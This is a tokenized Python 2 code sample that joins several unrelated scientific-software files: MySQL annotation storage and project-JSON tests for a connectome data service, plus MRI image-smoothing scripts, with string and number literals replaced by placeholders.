args [ <NUM_LIT:1> ] , sql ) ) <EOL> if self . author != "<STR_LIT>" : <EOL> self . kvpairs [ '<STR_LIT>' ] = self . author <EOL> sql = "<STR_LIT>" % ( anno_dbtables [ '<STR_LIT>' ] , self . annid ) <EOL> try : <EOL> cursor . execute ( sql ) <EOL> except MySQLdb . Error , e : <EOL> logger . warning ( "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] , sql ) ) <EOL> raise OCPCAError ( "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] , sql ) ) <EOL> kvresult = cursor . fetchall ( ) <EOL> kvupdate = { } <EOL> for kv in kvresult : <EOL> if self . kvpairs . has_key ( kv [ <NUM_LIT:1> ] ) : <EOL> if self . kvpairs [ kv [ <NUM_LIT:1> ] ] != kv [ <NUM_LIT:2> ] : <EOL> kvupdate [ kv [ <NUM_LIT:1> ] ] = self . kvpairs [ kv [ <NUM_LIT:1> ] ] <EOL> del ( self . kvpairs [ kv [ <NUM_LIT:1> ] ] ) <EOL> if len ( kvupdate ) != <NUM_LIT:0> : <EOL> for ( k , v ) in kvupdate . iteritems ( ) : <EOL> sql = "<STR_LIT>" % ( anno_dbtables [ '<STR_LIT>' ] , v , self . annid , k ) <EOL> cursor . execute ( sql ) <EOL> if len ( self . kvpairs ) != <NUM_LIT:0> : <EOL> kvclause = '<STR_LIT:U+002C>' . join ( [ '<STR_LIT:(>' + str ( self . annid ) + '<STR_LIT>' + k + '<STR_LIT>' + v + '<STR_LIT>' for ( k , v ) in self . kvpairs . iteritems ( ) ] ) <EOL> sql = "<STR_LIT>" % ( anno_dbtables [ '<STR_LIT>' ] , kvclause ) <EOL> try : <EOL> cursor . execute ( sql ) <EOL> except MySQLdb . Error , e : <EOL> logger . warning ( "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] , sql ) ) <EOL> raise OCPCAError ( "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] , sql ) ) <EOL> def delete ( self , cursor ) : <EOL> """<STR_LIT>""" <EOL> sql = "<STR_LIT>" % ( anno_dbtables [ '<STR_LIT>' ] , self . annid ) <EOL> sql += "<STR_LIT>" % ( anno_dbtables [ '<STR_LIT>' ] , self . annid ) <EOL> try : <EOL> cursor . execute ( sql ) <EOL> except MySQLdb . Error , e : <EOL> logger . warning ( "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . 
args [ <NUM_LIT:1> ] , sql ) ) <EOL> raise OCPCAError ( "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] , sql ) ) <EOL> def retrieve ( self , annid , cursor ) : <EOL> """<STR_LIT>""" <EOL> sql = "<STR_LIT>" % ( anno_dbtables [ '<STR_LIT>' ] , annid ) <EOL> try : <EOL> cursor . execute ( sql ) <EOL> except MySQLdb . Error , e : <EOL> logger . warning ( "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] , sql ) ) <EOL> raise OCPCAError ( "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] , sql ) ) <EOL> ( self . annid , annotype , self . confidence , self . status ) = cursor . fetchone ( ) <EOL> sql = "<STR_LIT>" % ( anno_dbtables [ '<STR_LIT>' ] , annid ) <EOL> try : <EOL> cursor . execute ( sql ) <EOL> kvpairs = cursor . fetchall ( ) <EOL> except MySQLdb . Error , e : <EOL> logger . warning ( "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] , sql ) ) <EOL> raise OCPCAError ( "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] , sql ) ) <EOL> for kv in kvpairs : <EOL> self . kvpairs [ kv [ <NUM_LIT:1> ] ] = kv [ <NUM_LIT:2> ] <EOL> if self . kvpairs . get ( '<STR_LIT>' ) : <EOL> self . author = self . kvpairs [ '<STR_LIT>' ] <EOL> del ( self . kvpairs [ '<STR_LIT>' ] ) <EOL> else : <EOL> self . author = "<STR_LIT>" <EOL> return annotype </s>
<s> import time <EOL> import os <EOL> def getTime ( filename , func , * args ) : <EOL> """<STR_LIT>""" <EOL> os . chdir ( '<STR_LIT>' ) <EOL> f = open ( filename , '<STR_LIT>' ) <EOL> starttime = time . time ( ) <EOL> returnvalue = func ( * args ) <EOL> endtime = time . time ( ) <EOL> f . write ( '<STR_LIT>' . format ( endtime - starttime ) ) <EOL> return returnvalue </s>
<s> import sys , os <EOL> import argparse <EOL> sys . path += [ os . path . abspath ( '<STR_LIT>' ) ] <EOL> import OCP . settings <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> from django . conf import settings <EOL> import django <EOL> django . setup ( ) <EOL> from OCP import celery_app <EOL> def main ( ) : <EOL> parser = argparse . ArgumentParser ( description = "<STR_LIT>" ) <EOL> parser . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store>' , help = '<STR_LIT>' ) <EOL> result = parser . parse_args ( ) <EOL> res = celery_app . AsyncResult ( result . taskid ) <EOL> print res . state <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> import os <EOL> import sys <EOL> import json <EOL> import tempfile <EOL> import pytest <EOL> import numpy as np <EOL> import random <EOL> sys . path += [ os . path . abspath ( '<STR_LIT>' ) ] <EOL> import OCP . settings <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> from ocptype import IMAGE , UINT8 <EOL> from params import Params <EOL> from jsonproj import createJson <EOL> from postmethods import getURL , postURL , postNPZ , getNPZ <EOL> import makeunitdb <EOL> import site_to_test <EOL> SITE_HOST = site_to_test . site <EOL> p = Params ( ) <EOL> p . token = '<STR_LIT>' <EOL> p . resolution = <NUM_LIT:0> <EOL> p . channels = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> p . channel_type = IMAGE <EOL> p . datatype = UINT8 <EOL> p . dataset = '<STR_LIT>' <EOL> class Test_Project_Json ( ) : <EOL> def setup_class ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def teardown_class ( self ) : <EOL> """<STR_LIT>""" <EOL> makeunitdb . deleteTestDBList ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def test_basic_json ( self ) : <EOL> """<STR_LIT>""" <EOL> dataset = ( p . dataset , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> ] , [ <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT> ] , None , None , None , None ) <EOL> project = ( p . token , None , None ) <EOL> channels = { p . channels [ <NUM_LIT:0> ] : ( p . channels [ <NUM_LIT:0> ] , p . datatype , p . channel_type , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None , None , None , None ) } <EOL> metadata = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> json_file = tempfile . NamedTemporaryFile ( mode = '<STR_LIT>' ) <EOL> json_file . write ( createJson ( dataset , project , channels , metadata = metadata ) ) <EOL> json_file . seek ( <NUM_LIT:0> ) <EOL> response = json . loads ( postURL ( "<STR_LIT>" . format ( SITE_HOST ) , json_file ) . read ( ) ) <EOL> assert ( '<STR_LIT>' == response ) <EOL> f = getURL ( "<STR_LIT>" . format ( SITE_HOST , p . token ) ) <EOL> proj_info = json . loads ( f . 
read ( ) ) <EOL> assert ( proj_info [ '<STR_LIT>' ] [ '<STR_LIT:name>' ] == p . token ) <EOL> assert ( proj_info [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT:0>' ] == [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> ] ) <EOL> assert ( proj_info [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT:0>' ] == [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:16> ] ) <EOL> assert ( proj_info [ '<STR_LIT>' ] [ '<STR_LIT>' ] == <NUM_LIT:1> ) <EOL> assert ( proj_info [ '<STR_LIT>' ] [ p . channels [ <NUM_LIT:0> ] ] [ '<STR_LIT>' ] == <NUM_LIT:0> ) <EOL> assert ( proj_info [ '<STR_LIT>' ] [ p . channels [ <NUM_LIT:0> ] ] [ '<STR_LIT>' ] == p . datatype ) <EOL> try : <EOL> assert ( proj_info [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] == '<STR_LIT>' ) <EOL> except KeyError : <EOL> print "<STR_LIT>" <EOL> except AssertionError : <EOL> print "<STR_LIT>" <EOL> def test_complex_json ( self ) : <EOL> """<STR_LIT>""" <EOL> p . token = '<STR_LIT>' <EOL> dataset = ( p . dataset , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> ] , [ <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT> ] , [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , None , None , None ) <EOL> project = ( p . token , None , None ) <EOL> channels = { p . channels [ <NUM_LIT:1> ] : ( p . channels [ <NUM_LIT:1> ] , p . datatype , p . channel_type , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None , None , None , None ) } <EOL> json_file = tempfile . NamedTemporaryFile ( mode = '<STR_LIT>' ) <EOL> json_file . write ( createJson ( dataset , project , channels ) ) <EOL> json_file . seek ( <NUM_LIT:0> ) <EOL> response = json . loads ( postURL ( "<STR_LIT>" . format ( SITE_HOST ) , json_file ) . read ( ) ) <EOL> assert ( '<STR_LIT>' == response ) <EOL> f = getURL ( "<STR_LIT>" . format ( SITE_HOST , p . token ) ) <EOL> proj_info = json . loads ( f . read ( ) ) <EOL> assert ( proj_info [ '<STR_LIT>' ] [ '<STR_LIT:name>' ] == p . 
token ) <EOL> assert ( proj_info [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT:0>' ] == [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> ] ) <EOL> assert ( proj_info [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT:0>' ] == [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:16> ] ) <EOL> assert ( proj_info [ '<STR_LIT>' ] [ '<STR_LIT>' ] == <NUM_LIT:1> ) <EOL> assert ( proj_info [ '<STR_LIT>' ] [ p . channels [ <NUM_LIT:1> ] ] [ '<STR_LIT>' ] == <NUM_LIT:0> ) <EOL> assert ( proj_info [ '<STR_LIT>' ] [ p . channels [ <NUM_LIT:1> ] ] [ '<STR_LIT>' ] == p . datatype ) <EOL> def test_error_json ( self ) : <EOL> """<STR_LIT>""" <EOL> dataset = ( p . dataset , [ <NUM_LIT:1000> , <NUM_LIT> , <NUM_LIT:1000> ] , [ <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT> ] , [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , None , None , None ) <EOL> project = ( p . token , None , None ) <EOL> channels = { p . channels [ <NUM_LIT:1> ] : ( p . channels [ <NUM_LIT:1> ] , p . datatype , p . channel_type , '<STR_LIT>' , '<STR_LIT>' , None , None , None , None ) } <EOL> json_file = tempfile . NamedTemporaryFile ( mode = '<STR_LIT>' ) <EOL> json_file . write ( createJson ( dataset , project , channels ) ) <EOL> json_file . seek ( <NUM_LIT:0> ) <EOL> response = json . loads ( postURL ( "<STR_LIT>" . format ( SITE_HOST ) , json_file ) . read ( ) ) <EOL> assert ( '<STR_LIT>' == response ) <EOL> class Test_Create_Channel_Json ( ) : <EOL> def setup_class ( self ) : <EOL> """<STR_LIT>""" <EOL> p . channels = [ ] <EOL> makeunitdb . createTestDB ( p . token , channel_list = p . channels , ximagesize = <NUM_LIT> , yimagesize = <NUM_LIT> , zimagesize = <NUM_LIT:1000> , xvoxelres = <NUM_LIT:1.0> , yvoxelres = <NUM_LIT:1.0> , zvoxelres = <NUM_LIT> ) <EOL> def teardown_class ( self ) : <EOL> """<STR_LIT>""" <EOL> makeunitdb . deleteTestDB ( p . token ) <EOL> def test_create_json ( self ) : <EOL> """<STR_LIT>""" <EOL> p . channels = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> dataset = ( p . 
dataset , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1000> ] , [ <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT> ] , None , None , None , None ) <EOL> project = ( p . token , None , None ) <EOL> channels = { p . channels [ <NUM_LIT:0> ] : ( p . channels [ <NUM_LIT:0> ] , p . datatype , p . channel_type , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None , None , None , <NUM_LIT:0> ) , p . channels [ <NUM_LIT:1> ] : ( p . channels [ <NUM_LIT:1> ] , p . datatype , p . channel_type , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None , None , None , <NUM_LIT:0> ) , } <EOL> json_file = tempfile . NamedTemporaryFile ( mode = '<STR_LIT>' ) <EOL> json_file . write ( createJson ( dataset , project , channels , channel_only = True ) ) <EOL> json_file . seek ( <NUM_LIT:0> ) <EOL> response = json . loads ( postURL ( "<STR_LIT>" . format ( SITE_HOST , p . token ) , json_file ) . read ( ) ) <EOL> assert ( '<STR_LIT>' == response ) <EOL> f = getURL ( "<STR_LIT>" . format ( SITE_HOST , p . token ) ) <EOL> proj_info = json . loads ( f . read ( ) ) <EOL> assert ( proj_info [ '<STR_LIT>' ] [ '<STR_LIT:name>' ] == p . token ) <EOL> assert ( proj_info [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT:0>' ] == [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1000> ] ) <EOL> assert ( proj_info [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT:0>' ] == [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:16> ] ) <EOL> assert ( proj_info [ '<STR_LIT>' ] [ '<STR_LIT>' ] == <NUM_LIT:5> ) <EOL> assert ( proj_info [ '<STR_LIT>' ] [ p . channels [ <NUM_LIT:0> ] ] [ '<STR_LIT>' ] == <NUM_LIT:0> ) <EOL> assert ( proj_info [ '<STR_LIT>' ] [ p . channels [ <NUM_LIT:0> ] ] [ '<STR_LIT>' ] == p . channel_type ) <EOL> assert ( proj_info [ '<STR_LIT>' ] [ p . channels [ <NUM_LIT:1> ] ] [ '<STR_LIT>' ] == p . datatype ) <EOL> p . args = ( <NUM_LIT:1000> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:200> , <NUM_LIT> ) <EOL> image_data = np . ones ( [ <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:100> , <NUM_LIT:100> ] , dtype = np . uint8 ) * random . 
randint ( <NUM_LIT:0> , <NUM_LIT:255> ) <EOL> response = postNPZ ( p , image_data ) <EOL> voxarray = getNPZ ( p ) <EOL> assert ( np . array_equal ( image_data , voxarray ) ) <EOL> def test_error_json ( self ) : <EOL> """<STR_LIT>""" <EOL> dataset = ( p . dataset , [ <NUM_LIT:1000> , <NUM_LIT> , <NUM_LIT:1000> ] , [ <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT> ] , [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , None , None , None ) <EOL> project = ( p . token , None , None ) <EOL> channels = { p . channels [ <NUM_LIT:1> ] : ( p . channels [ <NUM_LIT:1> ] , p . datatype , p . channel_type , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None , None , None , None ) } <EOL> json_file = tempfile . NamedTemporaryFile ( mode = '<STR_LIT>' ) <EOL> json_file . write ( createJson ( dataset , project , channels , channel_only = True ) ) <EOL> json_file . seek ( <NUM_LIT:0> ) <EOL> response = json . loads ( postURL ( "<STR_LIT>" . format ( SITE_HOST , p . token ) , json_file ) . read ( ) ) <EOL> assert ( '<STR_LIT>' == response ) <EOL> class Test_Delete_Channel_Json ( ) : <EOL> def setup_class ( self ) : <EOL> """<STR_LIT>""" <EOL> makeunitdb . createTestDB ( p . token , channel_list = p . channels , channel_type = p . channel_type , channel_datatype = p . datatype ) <EOL> def teardown_class ( self ) : <EOL> """<STR_LIT>""" <EOL> makeunitdb . deleteTestDB ( p . token ) <EOL> def test_single_channel_json ( self ) : <EOL> """<STR_LIT>""" <EOL> ocp_dict = { '<STR_LIT>' : ( p . channels [ <NUM_LIT:1> ] , ) } <EOL> json_file = tempfile . NamedTemporaryFile ( mode = '<STR_LIT>' ) <EOL> json_file . write ( json . dumps ( ocp_dict , sort_keys = True , indent = <NUM_LIT:4> ) ) <EOL> json_file . seek ( <NUM_LIT:0> ) <EOL> response = json . loads ( postURL ( "<STR_LIT>" . format ( SITE_HOST , p . token ) , json_file ) . read ( ) ) <EOL> assert ( '<STR_LIT>' == response ) <EOL> f = getURL ( "<STR_LIT>" . format ( SITE_HOST , p . token ) ) <EOL> proj_info = json . loads ( f . 
read ( ) ) <EOL> assert ( proj_info [ '<STR_LIT>' ] [ '<STR_LIT:name>' ] == p . token ) <EOL> assert ( proj_info [ '<STR_LIT>' ] [ p . channels [ <NUM_LIT:0> ] ] [ '<STR_LIT>' ] == <NUM_LIT:0> ) </s>
<s> import urllib2 <EOL> token = '<STR_LIT>' <EOL> channel = '<STR_LIT>' <EOL> graphtype = '<STR_LIT>' <EOL> url = '<STR_LIT>' . format ( '<STR_LIT>' , token , channel , graphtype ) <EOL> try : <EOL> req = urllib2 . Request ( url ) <EOL> resposne = urllib2 . urlopen ( req ) <EOL> except Exception , e : <EOL> raise </s>
<s> import json <EOL> import os <EOL> DEFAULT_JSON_OUTPUT = '<STR_LIT>' <EOL> class GlobalCounter : <EOL> def __init__ ( self ) : <EOL> self . data = { } <EOL> @ staticmethod <EOL> def fqn ( class_name , method , lineno ) : <EOL> name = method + '<STR_LIT::>' + str ( lineno ) <EOL> if class_name and class_name != '<STR_LIT:None>' : <EOL> name = class_name + '<STR_LIT>' + name <EOL> return name <EOL> def count ( self , file , class_name = None , method = None , lineno = - <NUM_LIT:1> ) : <EOL> if file not in self . data : <EOL> self . data [ file ] = { } <EOL> d = self . data [ file ] <EOL> name = GlobalCounter . fqn ( class_name , method , lineno ) <EOL> if name not in d : <EOL> d [ name ] = <NUM_LIT:0> <EOL> d [ name ] += <NUM_LIT:1> <EOL> def to_json ( self , file_location = DEFAULT_JSON_OUTPUT ) : <EOL> print "<STR_LIT>" % file_location <EOL> try : <EOL> fd = open ( file_location , '<STR_LIT:w>' ) <EOL> json . dump ( self . data , fd , indent = <NUM_LIT:2> , sort_keys = True ) <EOL> fd . close ( ) <EOL> except Exception , ex : <EOL> print "<STR_LIT>" , str ( ex ) <EOL> GlobalCounterInst = GlobalCounter ( ) </s>
<s> from generate_phantom import get_tracts , save_3D_nparray_niftii <EOL> from numpy import zeros , empty <EOL> tracts_to_sum_index = <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:8> , <NUM_LIT:9> , <NUM_LIT:10> , <NUM_LIT:11> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:15> , <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:20> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> <EOL> folder_atlas = "<STR_LIT>" <EOL> tracts_sum_img = "<STR_LIT>" <EOL> def main ( ) : <EOL> tracts = get_tracts ( folder_atlas ) <EOL> tracts_sum = add_tracts ( tracts , tracts_to_sum_index ) <EOL> save_3D_nparray_niftii ( tracts_sum , tracts_sum_img ) <EOL> def add_tracts ( tracts , tracts_to_sum_index ) : <EOL> tracts_sum = empty ( ( tracts [ <NUM_LIT:0> , <NUM_LIT:0> ] ) . shape ) <EOL> for i in tracts_to_sum_index : <EOL> tracts_sum = tracts_sum + tracts [ i , <NUM_LIT:0> ] <EOL> return tracts_sum <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> import splines_approximation_v2 as spline <EOL> import glob <EOL> import commands <EOL> import sct_utils <EOL> def main ( ) : <EOL> i = <NUM_LIT> <EOL> b = [ <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:9> , <NUM_LIT:11> , <NUM_LIT> , <NUM_LIT:15> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> for file in glob . glob ( '<STR_LIT>' ) : <EOL> path , file_name , ext_fname = sct_utils . extract_fname ( file ) <EOL> cmd1 = '<STR_LIT>' + file_name <EOL> print cmd1 <EOL> status , output = commands . getstatusoutput ( cmd1 ) <EOL> print status , output <EOL> for bc in b : <EOL> spline . main ( file , bc ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> import os <EOL> import getopt <EOL> import sys <EOL> import sct_utils as sct <EOL> import scipy . ndimage <EOL> try : <EOL> import nibabel <EOL> except ImportError : <EOL> print '<STR_LIT>' <EOL> sys . exit ( <NUM_LIT:2> ) <EOL> try : <EOL> import numpy as np <EOL> except ImportError : <EOL> print '<STR_LIT>' <EOL> sys . exit ( <NUM_LIT:2> ) <EOL> def main ( ) : <EOL> strategy = "<STR_LIT>" <EOL> fname_centerline = "<STR_LIT>" <EOL> fname_input_image = "<STR_LIT>" <EOL> fname_output_image = "<STR_LIT>" <EOL> fname_mask = "<STR_LIT>" <EOL> path_script = os . path . dirname ( __file__ ) + '<STR_LIT:/>' <EOL> try : <EOL> opts , args = getopt . getopt ( sys . argv [ <NUM_LIT:1> : ] , '<STR_LIT>' ) <EOL> except getopt . GetoptError as err : <EOL> print str ( err ) <EOL> usage ( ) <EOL> for opt , arg in opts : <EOL> if opt == '<STR_LIT>' : <EOL> usage ( ) <EOL> elif opt in ( '<STR_LIT>' ) : <EOL> fname_input_image = arg <EOL> elif opt in ( '<STR_LIT>' ) : <EOL> fname_output_image = arg <EOL> elif opt in ( '<STR_LIT>' ) : <EOL> fname_mask = arg <EOL> elif opt in ( '<STR_LIT>' ) : <EOL> filter_type = str ( arg ) <EOL> elif opt in ( '<STR_LIT>' ) : <EOL> strategy = str ( arg ) <EOL> elif opt in ( '<STR_LIT:-c>' ) : <EOL> fname_centerline = arg <EOL> if fname_input_image == '<STR_LIT>' or fname_mask == '<STR_LIT>' or ( strategy == "<STR_LIT>" and fname_centerline == "<STR_LIT>" ) : <EOL> print ( "<STR_LIT>" ) <EOL> usage ( ) <EOL> sct . check_file_exist ( fname_input_image ) <EOL> sct . check_file_exist ( fname_mask ) <EOL> if strategy == "<STR_LIT>" : <EOL> sct . check_file_exist ( fname_centerline ) <EOL> path_input_image , file_input_image , ext_input_image = sct . extract_fname ( fname_input_image ) <EOL> path_output_image , file_output_image , ext_output_image = sct . extract_fname ( fname_output_image ) <EOL> img = nibabel . load ( fname_input_image ) <EOL> data = img . get_data ( ) <EOL> hdr = img . get_header ( ) <EOL> mask = nibabel . 
load ( fname_mask ) <EOL> mask_data = mask . get_data ( ) <EOL> mask_hdr = mask . get_header ( ) <EOL> if strategy == "<STR_LIT>" : <EOL> print ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> data = smooth_mean_per_slice ( data , mask_data ) <EOL> elif strategy == "<STR_LIT>" : <EOL> print ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> data = smooth_along_centerline ( data , fname_input_image , file_input_image , ext_input_image , mask_data , <EOL> fname_centerline ) <EOL> elif strategy == "<STR_LIT>" or "<STR_LIT>" : <EOL> print ( "<STR_LIT>" ) <EOL> data = smooth_total ( data , mask_data ) <EOL> else : <EOL> print ( "<STR_LIT>" ) <EOL> usage ( ) <EOL> hdr . set_data_dtype ( '<STR_LIT>' ) <EOL> print '<STR_LIT>' <EOL> img = nibabel . Nifti1Image ( data , None , hdr ) <EOL> nibabel . save ( img , '<STR_LIT>' + file_output_image + '<STR_LIT>' ) <EOL> sct . generate_output_file ( '<STR_LIT>' + file_output_image + '<STR_LIT>' , '<STR_LIT>' , file_output_image , ext_output_image ) <EOL> def apply_filter ( data , filter_type = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> if filter_type == '<STR_LIT>' : <EOL> print '<STR_LIT>' <EOL> sigma = <NUM_LIT:1> <EOL> data_filtered = scipy . ndimage . filters . gaussian_filter ( data , sigma ) <EOL> return data_filtered <EOL> def smooth_mean_per_slice ( data , mask_data ) : <EOL> """<STR_LIT>""" <EOL> X , Y , Z = ( mask_data > <NUM_LIT:0> ) . nonzero ( ) <EOL> N = len ( X ) <EOL> Z_min = min ( Z ) <EOL> Z_max = max ( Z ) <EOL> Z_nb = Z_max - Z_min + <NUM_LIT:1> <EOL> x = len ( data ) <EOL> y = len ( data [ <NUM_LIT:1> ] ) <EOL> z = len ( data [ <NUM_LIT:1> ] [ <NUM_LIT:1> ] ) <EOL> sc_values = [ [ ] for Z_index in range ( <NUM_LIT:0> , Z_nb ) ] <EOL> for vox_index in range ( <NUM_LIT:0> , N ) : <EOL> sc_values [ Z [ vox_index ] - Z_min ] . 
append ( data [ X [ vox_index ] ] [ Y [ vox_index ] ] [ Z [ vox_index ] ] ) <EOL> print '<STR_LIT>' <EOL> sc_mean_per_slice = [ <NUM_LIT:0> for Z_index in range ( <NUM_LIT:0> , Z_nb ) ] <EOL> for Z_index in range ( <NUM_LIT:0> , Z_nb ) : <EOL> sc_mean_per_slice [ Z_index ] = sum ( sc_values [ Z_index ] ) / len ( sc_values [ Z_index ] ) <EOL> print '<STR_LIT>' <EOL> sc_data = [ [ [ <NUM_LIT:0> for k in range ( <NUM_LIT:0> , z ) ] for j in range ( <NUM_LIT:0> , y ) ] for i in <EOL> range ( <NUM_LIT:0> , x ) ] <EOL> for k in range ( <NUM_LIT:0> , z ) : <EOL> for j in range ( <NUM_LIT:0> , y ) : <EOL> for i in range ( <NUM_LIT:0> , x ) : <EOL> if k < Z_min : <EOL> sc_data [ i ] [ j ] [ k ] = sc_mean_per_slice [ <NUM_LIT:0> ] <EOL> elif Z_min <= k <= Z_max : <EOL> sc_data [ i ] [ j ] [ k ] = sc_mean_per_slice [ k - Z_min ] <EOL> elif k > Z_max : <EOL> sc_data [ i ] [ j ] [ k ] = sc_mean_per_slice [ len ( sc_mean_per_slice ) - <NUM_LIT:1> ] <EOL> for i in range ( <NUM_LIT:0> , N ) : <EOL> sc_data [ X [ i ] ] [ Y [ i ] ] [ Z [ i ] ] = data [ X [ i ] ] [ Y [ i ] ] [ Z [ i ] ] <EOL> smoothed_sc_data = apply_filter ( sc_data ) <EOL> for i in range ( <NUM_LIT:0> , N ) : <EOL> data [ X [ i ] ] [ Y [ i ] ] [ Z [ i ] ] = smoothed_sc_data [ X [ i ] ] [ Y [ i ] ] [ Z [ i ] ] <EOL> return data <EOL> def smooth_total ( data , mask_data ) : <EOL> """<STR_LIT>""" <EOL> X , Y , Z = ( mask_data > <NUM_LIT:0> ) . nonzero ( ) <EOL> N = len ( X ) <EOL> smoothed_sc_data = apply_filter ( data ) <EOL> for i in range ( <NUM_LIT:0> , N ) : <EOL> data [ X [ i ] ] [ Y [ i ] ] [ Z [ i ] ] = smoothed_sc_data [ X [ i ] ] [ Y [ i ] ] [ Z [ i ] ] <EOL> return data <EOL> def smooth_along_centerline ( data , fname_input_image , file_input_image , ext_input_image , mask_data , fname_centerline ) : <EOL> """<STR_LIT>""" <EOL> X , Y , Z = ( mask_data > <NUM_LIT:0> ) . nonzero ( ) <EOL> N = len ( X ) <EOL> print ( "<STR_LIT>" ) <EOL> os . 
system ( "<STR_LIT>" + str ( fname_input_image ) + "<STR_LIT>" + str ( fname_centerline ) ) <EOL> print ( "<STR_LIT>" + "<STR_LIT>" + str ( file_input_image ) + "<STR_LIT>" + str ( ext_input_image ) + "<STR_LIT>" ) <EOL> smoothed_img = nibabel . load ( "<STR_LIT>" + str ( file_input_image ) + "<STR_LIT>" + str ( ext_input_image ) ) <EOL> smoothed_sc_data = smoothed_img . get_data ( ) <EOL> for i in range ( <NUM_LIT:0> , N ) : <EOL> data [ X [ i ] ] [ Y [ i ] ] [ Z [ i ] ] = smoothed_sc_data [ X [ i ] ] [ Y [ i ] ] [ Z [ i ] ] <EOL> return data <EOL> def usage ( ) : <EOL> print '<STR_LIT>' '<STR_LIT>' '<STR_LIT:\n>' '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' '<STR_LIT:\n>' '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' '<STR_LIT:\n>' '<STR_LIT:\n>' '<STR_LIT>' '<STR_LIT>' <EOL> sys . exit ( <NUM_LIT:2> ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
